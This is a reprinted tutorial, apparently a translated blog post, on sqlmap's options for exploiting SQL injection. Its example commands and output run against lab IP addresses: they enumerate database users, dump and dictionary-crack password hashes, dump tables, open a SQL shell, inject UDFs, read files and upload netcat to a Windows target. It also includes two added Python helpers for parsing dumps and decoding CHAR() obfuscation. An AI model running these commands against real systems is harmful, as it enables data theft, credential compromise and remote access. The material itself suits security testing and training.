12. Enumerate the data
The parameters in this section enumerate information about the database management system, the structure of its data (databases, tables, columns) and the data itself.
1. Enumerate everything at once
Parameter: --all
This parameter enumerates everything that can be reached. It is not recommended, however, because it sends a very large number of requests and retrieves a lot of useless information along with the useful.
2. Enumerate database management system information
Parameters: -b or --banner
Most modern database management systems have a function or environment variable that returns the version number and latest patch level of the DBMS, and often information about the underlying operating system as well. Typically the function is version() and the environment variable is @@version, but this depends on the target DBMS. The parameter "-b" or "--banner" enumerates this information.
The database in the following example is Oracle:
python sqlmap.py -u "http://192.168.136.131/sqlmap/oracle/get_int.php?id=1" --banner
The partial output is:
[09:54:30] [INFO] fetching banner
web application technology: PHP 5.2.6, Apache 2.2.9
back-end DBMS: Oracle
banner: 'Oracle Database 10g Enterprise Edition Release 10.2.0.1.0 - Prod'
The database in the following example is MySQL:
python sqlmap.py -u "http://192.168.56.102/user.php?id=1" --banner
The partial output is:
[09:56:32] [INFO] fetching banner
back-end DBMS operating system: Linux Ubuntu
back-end DBMS: MySQL >= 5.0
banner: '5.5.50-0ubuntu0.14.04.1'
3. Enumerate the current user
Parameter: --current-user
This parameter enumerates the database user that executes the web application's SQL statements.
4. Enumerate the current database
Parameter: --current-db
This parameter enumerates the name of the database the web application is connected to.
5. Enumerate the server hostname
Parameter: --hostname
This parameter enumerates the hostname of the machine on which the database management system runs, for example:
python sqlmap.py -u "http://192.168.136.131/sqlmap/mysql/get_int.php?id=1" --hostname
Some of the output is as follows:
[xx:xx:04] [INFO] fetching server hostname
[xx:xx:04] [INFO] retrieved: debian-5.0-i386
hostname: 'debian-5.0-i386'
6. Detect whether the current user is an administrator
Parameter: --is-dba
This parameter checks whether the current database user is an administrator (DBA): it returns True if so and False otherwise. For example:
python sqlmap.py -u "http://192.168.56.102/user.php?id=1" --is-dba
The partial output is:
[10:05:16] [INFO] testing if current user is DBA
[10:05:16] [INFO] fetching current user
[10:05:16] [WARNING] reflective value(s) found and filtering out
current user is DBA: True
7. Enumerate the database management system users
Parameter: --users
When the current user has permission to read the system tables that hold user information, this parameter enumerates the users of the database management system.
8. Enumerate and crack the database management system users' password hashes
Parameter: --passwords
When the current user has permission to read the system tables that hold the users' password hashes, this parameter enumerates them. sqlmap lists the users first and then the password hash of each.
Here is an example with PostgreSQL as the target:
python sqlmap.py -u "http://192.168.136.131/sqlmap/pgsql/get_int.php?id=1" --passwords -v 1
Some of the output is as follows:
back-end DBMS: PostgreSQL
[hh:mm:38] [INFO] fetching database users password hashes
do you want to use dictionary attack on retrieved password hashes? [y/n/q] y
[hh:mm:42] [INFO] using hash method: 'postgres_passwd'
what's the dictionary's location? [/software/sqlmap/txt/wordlist.txt]
[hh:mm:46] [INFO] loading dictionary from: '/software/sqlmap/txt/wordlist.txt'
do you want to use common password suffixes? (slow!) [y/n] n
[hh:mm:48] [INFO] starting dictionary attack (postgres_passwd)
[hh:mm:49] [INFO] found: 'testpass' for user: 'testuser'
[hh:mm:50] [INFO] found: 'testpass' for user: 'postgres'
database management system users password hashes:
[*] postgres [1]:
    password hash: md5d7d880f96044b72d0bba108ace96d1e4
    clear-text password: testpass
[*] testuser [1]:
    password hash: md599e5ea7a6f7c3269995cba3927fd0093
    clear-text password: testpass
sqlmap not only lists the password hashes, it also recognises the hash format and asks whether to run a dictionary attack against the hashes to recover the clear-text passwords.
To enumerate only a specific user's password, name the user with the parameter "-U"; "CU" stands for the current user. For example:
python sqlmap.py -u "http://192.168.56.102/user.php?id=1" --passwords -U CU
Some of the output is as follows:
database management system users password hashes:
[*] root [1]:
    password hash: *81F5E21E35407D884A6CD4A731AEBFB6AF209E1B
    clear-text password: root
9. Enumerate the database management system users' privileges
Parameter: --privileges
When the current user has permission to read the system tables that hold user information, this parameter enumerates the privileges of each database user. The privileges show which users are administrators.
To enumerate only a specific user's privileges, name the user with the parameter "-U"; "CU" stands for the current user.
If the target is Microsoft SQL Server, this parameter only reports whether each user is an administrator; it does not list individual privileges.
10. Enumerate the database management system users' roles
Parameter: --roles
When the current user has permission to read the system tables that hold user information, this parameter enumerates the roles of each database user.
To enumerate only a specific user's roles, name the user with the parameter "-U"; "CU" stands for the current user.
The official manual says this feature is only available when the target database management system is Oracle, but in my testing it also worked on MySQL.
11. Enumerate all databases in the database management system
Parameter: --dbs
When the current user has permission to read the system tables that hold database information, this parameter enumerates all databases in the database management system.
12. Enumerate all tables in a database
Parameters: --tables, --exclude-sysdbs and -D
When the current user has permission to read the system tables that hold table information, the parameter "--tables" enumerates all tables in the database named with "-D". If no database is named with "-D", "--tables" alone enumerates the tables of every database. For example:
python sqlmap.py -u "http://192.168.56.102/user.php?id=1" -D DBName --tables
The parameter "--exclude-sysdbs" leaves out the system databases. On Oracle, give the TABLESPACE_NAME instead of a database name.
13. Enumerate all columns of a table
Parameters: --columns, -C, -T and -D
Permissions allowing, the parameter "--columns" lists the names and data types of all columns in the table named with "-T" in the database named with "-D".
If no database is named, the current database is used. With "-C" you can name only the columns of interest instead of listing them all.
Here is an example targeting SQLite:
python sqlmap.py -u "http://192.168.136.131/sqlmap/sqlite/get_int.php?id=1" --columns -D testdb -T users
Some of the output is as follows:
Database: SQLite_masterdb
Table: users
[3 columns]
+---------+---------+
| Column  | Type    |
+---------+---------+
| id      | INTEGER |
| name    | TEXT    |
| surname | TEXT    |
+---------+---------+
On PostgreSQL the database name must be "public" or a system database, because only the current database or the system databases can be enumerated there, and the alias of the database the web application connects to is always "public".
14. Enumerate the database management system schema
Parameters: --schema and --exclude-sysdbs
This option enumerates the schema of the database management system: all databases, tables and columns with their respective types, and triggers. As before, "--exclude-sysdbs" leaves out the system databases.
The following example targets MySQL. Some of the output is as follows:
[...]
Database: mysql
Table: procs_priv
[8 columns]
+--------------+----------------------------------------+
| Column       | Type                                   |
+--------------+----------------------------------------+
| Timestamp    | timestamp                              |
| User         | char(16)                               |
| Db           | char(64)                               |
| Grantor      | char(77)                               |
| Host         | char(60)                               |
| Proc_priv    | set('Execute','Alter Routine','Grant') |
| Routine_name | char(64)                               |
| Routine_type | enum('FUNCTION','PROCEDURE')           |
+--------------+----------------------------------------+
[...]
Database: mysql
Table: ndb_binlog_index
[7 columns]
+-----------+---------------------+
| Column    | Type                |
+-----------+---------------------+
| Position  | bigint(20) unsigned |
| Deletes   | bigint(20) unsigned |
| Epoch     | bigint(20) unsigned |
| File      | varchar(255)        |
| Inserts   | bigint(20) unsigned |
| Schemaops | bigint(20) unsigned |
| Updates   | bigint(20) unsigned |
+-----------+---------------------+
15. Count the entries in the tables
Parameter: --count
Sometimes you only want to know how many rows a table holds, not what they contain; this parameter does exactly that. For example:
python sqlmap.py -u "http://192.168.21.129/sqlmap/mssql/iis/get_int.asp?id=1" --count -D testdb
Some of the output is as follows:
Database: testdb
+----------------+---------+
| Table          | Entries |
+----------------+---------+
| dbo.users      | 4       |
| dbo.users_blob | 2       |
+----------------+---------+
16. Dump the data in a table
Parameters: --dump, -C, -T, -D, --start, --stop and --where
Permissions allowing, the data in a table can be enumerated. Name the database with "-D", the table with "-T" and the target columns with "-C". If only a table is named and no database, the current database is used. If no column is named, all columns of the table are dumped.
The following example targets Firebird:
python sqlmap.py -u "http://192.168.136.131/sqlmap/firebird/get_int.php?id=1" --dump -T users
Some of the output is as follows:
Database: Firebird_masterdb
Table: USERS
[4 entries]
+----+--------+------------+
| ID | NAME   | SURNAME    |
+----+--------+------------+
| 1  | luther | blisset    |
| 2  | fluffy | bunny      |
| 3  | wu     | ming       |
| 4  | NULL   | nameisnull |
+----+--------+------------+
With only "--dump" and "-D", all data in the entire database is dumped at once.
sqlmap automatically saves the data dumped with "--dump" to a CSV file and prints its path in the output, for example:
python sqlmap.py -u "http://192.168.136.131/sqlmap/sqlite/get_int.php?id=1" -D DSSchool --dump
The partial output is:
[11:15:27] [INFO] analyzing table dump for possible password hashes
Database: DSSchool
Table: T_SCORESYSTEMTEACHERS
[2 entries]
+-----+----------+-------+---------+----------+
| AGE | NAME     | TITLE | ACCOUNT | PASSWORD |
+-----+----------+-------+---------+----------+
| 21  | neo      | ??    | 001     | 001      |
| 31  | morphine | ??    | 002     | 002      |
+-----+----------+-------+---------+----------+
[11:15:27] [INFO] table 'DSSchool.T_SCORESYSTEMTEACHERS' dumped to CSV file '/home/werner/.sqlmap/output/192.168.56.102/dump/DSSchool/T_SCORESYSTEMTEACHERS.csv'
The last line of the excerpted output gives the path of the saved CSV file.
To dump only part of the data, use the parameters "--start" and "--stop". "--stop 1" alone dumps only the first entry; "--start 1 --stop 3" dumps the second and third entries, so the range is open on the left and closed on the right. The range only takes effect with blind injection techniques; it is ignored for error-based and UNION query injection.
Besides limiting the dump by range, the parameter "--where" filters the dumped data. sqlmap turns it into a WHERE clause, so "--where id>3" dumps only the rows whose id column is greater than 3.
As you can see, sqlmap is very flexible: you can dump an entire database, or pick the columns in a table carefully and select specific rows within them.
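The table layout shown in the dumps above is the same one sqlmap prints for every table, so a small parser is handy when findings are reviewed offline or fed into a tracking sheet. The Python below is an added example, not code from the original post or from sqlmap; it assumes only the dump text as printed (a constructed sample is embedded inline), maps the bare word NULL to None, and checks the parsed rows against the "[N entries]" count so a truncated dump is noticed.

```python
import re
from typing import Dict, List, Optional

# Constructed sample in the shape of a sqlmap --dump table; the values are
# made up and mirror the Firebird example in the post.
SAMPLE_DUMP = """\
Database: Firebird_masterdb
Table: USERS
[4 entries]
+----+--------+------------+
| ID | NAME   | SURNAME    |
+----+--------+------------+
| 1  | luther | blisset    |
| 2  | fluffy | bunny      |
| 3  | wu     | ming       |
| 4  | NULL   | nameisnull |
+----+--------+------------+
"""

_ENTRIES = re.compile(r"\[(\d+) entries\]")


def _split_row(line: str) -> List[str]:
    """'| a | b |' -> ['a', 'b']; padding inside a cell is layout, not data."""
    return [cell.strip() for cell in line.strip().strip("|").split("|")]


def parse_dump(text: str) -> Dict[str, object]:
    """Parse one sqlmap table dump into {'database', 'table', 'declared', 'rows'}.

    rows are dicts keyed by column name. sqlmap prints SQL NULL as the bare word
    NULL, which becomes None so it cannot be confused with the string 'NULL'.
    'declared' is the '[N entries]' count sqlmap announced.
    """
    db = table = None
    declared: Optional[int] = None
    header: Optional[List[str]] = None
    rows: List[Dict[str, Optional[str]]] = []
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("Database:"):
            db = line.split(":", 1)[1].strip()
        elif line.startswith("Table:"):
            # "Table: USERS", or "Table: USERS [4 entries]" when the output was flattened
            table = line.split(":", 1)[1].split("[")[0].strip()
        elif line.startswith("|"):
            cells = _split_row(line)
            if header is None:
                header = cells  # the first pipe row holds the column names
                continue
            if len(cells) != len(header):
                raise ValueError(f"ragged row: {line!r}")
            rows.append({h: (None if v == "NULL" else v) for h, v in zip(header, cells)})
        # '+----+' borders and blank lines carry no data; the entries count may
        # sit on its own line or at the end of the Table: line
        m = _ENTRIES.search(line)
        if m:
            declared = int(m.group(1))
    return {"database": db, "table": table, "declared": declared, "rows": rows}


def dump_is_complete(parsed: Dict[str, object]) -> bool:
    """True when the rows parsed match the '[N entries]' count sqlmap announced."""
    return parsed["declared"] is not None and parsed["declared"] == len(parsed["rows"])
```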
17. Dump all data in all tables in all databases
Parameters: --dump-all and --exclude-sysdbs
The parameter "--dump-all" dumps all data in all tables of all databases. As before, "--exclude-sysdbs" leaves out the system databases.
Note that Microsoft SQL Server's master database is not treated as a system database, because some administrators store user data in it.
18. Search databases, tables and columns
Parameters: --search, -C, -T and -D
You can search for a database name, for a table name across all databases, or for a column name across all tables in all databases.
The parameter "--search" is used together with one of the following:
- -C: followed by comma-separated column names, searched across the whole database management system
- -T: followed by comma-separated table names, searched across the whole database management system
- -D: followed by comma-separated database names, searched across the whole database management system
When searching, sqlmap asks whether you want an exact match or a "contains" match. The default is the "contains" match, where a result counts as a hit if it contains the search string; an exact match requires the result to equal the search string.
19. Run custom SQL statements
Parameters: --sql-query and --sql-shell
This feature executes arbitrary SQL statements: sqlmap parses the given statement, picks the appropriate injection technique and packs the statement into a payload.
If the query is a SELECT statement, sqlmap returns its result. If the web application's database management system supports multi-statement queries, sqlmap uses the stacked queries technique. Note, however, that the web application itself may not support stacked queries; with PHP they are not available on MySQL, for instance, but they are on PostgreSQL.
The following example targets SQL Server 2000:
python sqlmap.py -u "http://192.168.136.131/sqlmap/mssql/get_int.php?id=1" --sql-query "SELECT 'foo'" -v 1
Some of the output is as follows:
[hh:mm:14] [INFO] fetching SQL SELECT query output: 'SELECT 'foo''
[hh:mm:14] [INFO] retrieved: foo
SELECT 'foo':    'foo'
python sqlmap.py -u "http://192.168.136.131/sqlmap/mssql/get_int.php?id=1" --sql-query "SELECT 'foo', 'bar'" -v 2
Some of the output is as follows:
[hh:mm:50] [INFO] fetching SQL SELECT query output: 'SELECT 'foo', 'bar''
[hh:mm:50] [INFO] the SQL query provided has more than a field. sqlmap will now unpack it into distinct queries to be able to retrieve the output even if we are going blind
[hh:mm:50] [DEBUG] query: SELECT ISNULL(CAST((CHAR(102)+CHAR(111)+CHAR(111)) AS VARCHAR(8000)), (CHAR(32)))
[hh:mm:50] [INFO] retrieved: foo
[hh:mm:50] [DEBUG] performed 27 queries in 0 seconds
[hh:mm:50] [DEBUG] query: SELECT ISNULL(CAST((CHAR(98)+CHAR(97)+CHAR(114)) AS VARCHAR(8000)), (CHAR(32)))
[hh:mm:50] [INFO] retrieved: bar
[hh:mm:50] [DEBUG] performed 27 quer
As you can see, sqlmap splits the supplied SQL statement into two separate SELECT statements and returns their results one by one.
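The DEBUG lines above show how sqlmap rewrites string literals as CHAR() concatenations before sending them, which is also how such queries appear in database audit logs and web server logs. The Python below is an added example, not code from the original post or from sqlmap; it decodes the MSSQL CHAR(a)+CHAR(b) chain shown above and, going one step beyond the page, the comma-separated CHAR(a,b,c) form used on MySQL, so an analyst can read the original literal when reviewing logged queries.

```python
import re
from typing import List, Tuple

# MSSQL style chain, as in the DEBUG lines above: CHAR(102)+CHAR(111)+CHAR(111).
# The \b keeps VARCHAR(8000) and NCHAR(...) from being mistaken for CHAR(...).
_PLUS_CHAIN = re.compile(r"\bCHAR\(\s*\d+\s*\)(?:\s*\+\s*\bCHAR\(\s*\d+\s*\))*", re.IGNORECASE)
# MySQL style, one call holding several codes: CHAR(102,111,111).
_COMMA_CALL = re.compile(r"\bCHAR\(\s*\d+(?:\s*,\s*\d+)+\s*\)", re.IGNORECASE)


def _codes_to_text(codes: List[str]) -> str:
    """Map character codes to text; non-printables become \\xNN so a log line stays readable."""
    out = []
    for code in codes:
        ch = chr(int(code))
        out.append(ch if ch.isprintable() else "\\x%02x" % ord(ch))
    return "".join(out)


def _matches(sql: str) -> List[Tuple[int, int, str]]:
    """Every CHAR()-built string in sql as (start, end, decoded), in source order."""
    found = []
    for pattern in (_COMMA_CALL, _PLUS_CHAIN):
        for m in pattern.finditer(sql):
            found.append((m.start(), m.end(), _codes_to_text(re.findall(r"\d+", m.group(0)))))
    return sorted(found)


def decoded_strings(sql: str) -> List[str]:
    """Only the decoded string values, e.g. for a SIEM field or a quick grep."""
    return [text for _, _, text in _matches(sql)]


def decode_char_concat(sql: str) -> str:
    """Rewrite CHAR() chains as ordinary quoted literals; everything else is left untouched."""
    pieces, last = [], 0
    for start, end, text in _matches(sql):
        pieces.append(sql[last:start])
        pieces.append("'" + text.replace("'", "''") + "'")  # re-quote the way SQL would
        last = end
    pieces.append(sql[last:])
    return "".join(pieces)
```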
The parameter "--sql-shell" provides an interactive SQL prompt with tab completion and command history. For example:
python sqlmap.py -u "http://192.168.56.102/user.php?id=1" --sql-shell
Some of the output is as follows:
[15:06:47] [INFO] calling MySQL shell. To quit type 'x' or 'q' and press ENTER
sql-shell> select 'foo';
[15:07:41] [INFO] fetching SQL SELECT statement query output: 'select 'foo''
select 'foo';:    'foo'
sql-shell> select password from mysql.user where user='root';
[15:07:42] [INFO] fetching SQL SELECT statement query output: 'select password from mysql.user where user='root''
select password from mysql.user where user='root'; [1]:
[*] *81F5E21E35407D884A6CD4A731AEBFB6AF209E1B
sql-shell> show tables;
[15:11:15] [INFO] fetching SQL SELECT statement query output: 'show tables'
[15:11:15] [WARNING] something went wrong with full UNION technique (could be because of limitation on retrieved number of entries)
show tables; [1]:
13. UDF injection
Parameter: --udf-inject
UDF is short for "user-defined function". UDF injection is an advanced injection technique for MySQL and PostgreSQL, described in detail in the paper "Advanced SQL injection to operating system full control".
You can compile MySQL or PostgreSQL shared libraries, a DLL on Windows or a shared object on Linux/Unix, and give sqlmap their local paths for UDF injection. sqlmap asks a few questions, then uploads the UDF file, creates the UDF and finally executes it according to the answers given. When the UDF injection is finished, sqlmap removes the uploaded UDF file.
Parameter: --shared-lib
With this parameter sqlmap asks for the path of the shared library file at run time.
The udf directory of the sqlmap installation holds many ready-made UDF files, which can be used directly according to the DBMS, operating system, bitness and version.
14. Access the file system
1. Read a file
Parameter: --file-read
When the database management system is MySQL, PostgreSQL or Microsoft SQL Server and the current user has the file-read privileges, files can be read. The file may be either a text file or a binary file; sqlmap handles both. The following example targets SQL Server 2005:
python sqlmap.py -u "http://192.168.136.129/sqlmap/mssql/iis/get_str2.asp?name=luther" --file-read "C:/example.exe" -v 1
Some of the output is as follows:
[hh:mm:49] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2000
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2005
[hh:mm:50] [INFO] fetching file: 'C:/example.exe'
[hh:mm:50] [INFO] the SQL query provided returns 3 entries
C:/example.exe file saved to: '/software/sqlmap/output/192.168.136.129/files/C__example.exe'
Then view the downloaded file:
$ ls -l output/192.168.136.129/files/C__example.exe
-rw-r--r-- 1 inquis inquis 2560 2011-MM-DD hh:mm output/192.168.136.129/files/C__example.exe
$ file output/192.168.136.129/files/C__example.exe
output/192.168.136.129/files/C__example.exe: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
2. Upload a file
Parameters: --file-write and --file-dest
When the database management system is MySQL, PostgreSQL or Microsoft SQL Server and the current user has the file-write privileges, files can be uploaded. The file may be either a text file or a binary file; sqlmap handles both. The following example targets MySQL and uploads a UPX-packed binary:
$ file /software/nc.exe.packed
/software/nc.exe.packed: PE32 executable for MS Windows (console) Intel 80386 32-bit
$ ls -l /software/nc.exe.packed
-rwxr-xr-x 1 inquis inquis 31744 2009-MM-DD hh:mm /software/nc.exe.packed
$ python sqlmap.py -u "http://192.168.136.129/sqlmap/mysql/get_int.aspx?id=1" --file-write "/software/nc.exe.packed" --file-dest "C:/windows/temp/nc.exe" -v 1
[...]
[hh:mm:29] [INFO] the back-end DBMS is MySQL
web server operating system: Windows 2003 or
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: MySQL >= 5.0.0
[...]
do you want confirmation that the file 'C:/windows/temp/nc.exe' has been successfully written on the back-end DBMS file system? [y/n] y
[hh:mm:52] [INFO] retrieved: 31744
[hh:mm:52] [INFO] the file has been successfully written and its size is 31744 bytes, same size as the local file '/software/nc.exe.packed'
To be continued ...
Security testing === sqlmap (II) (reprint)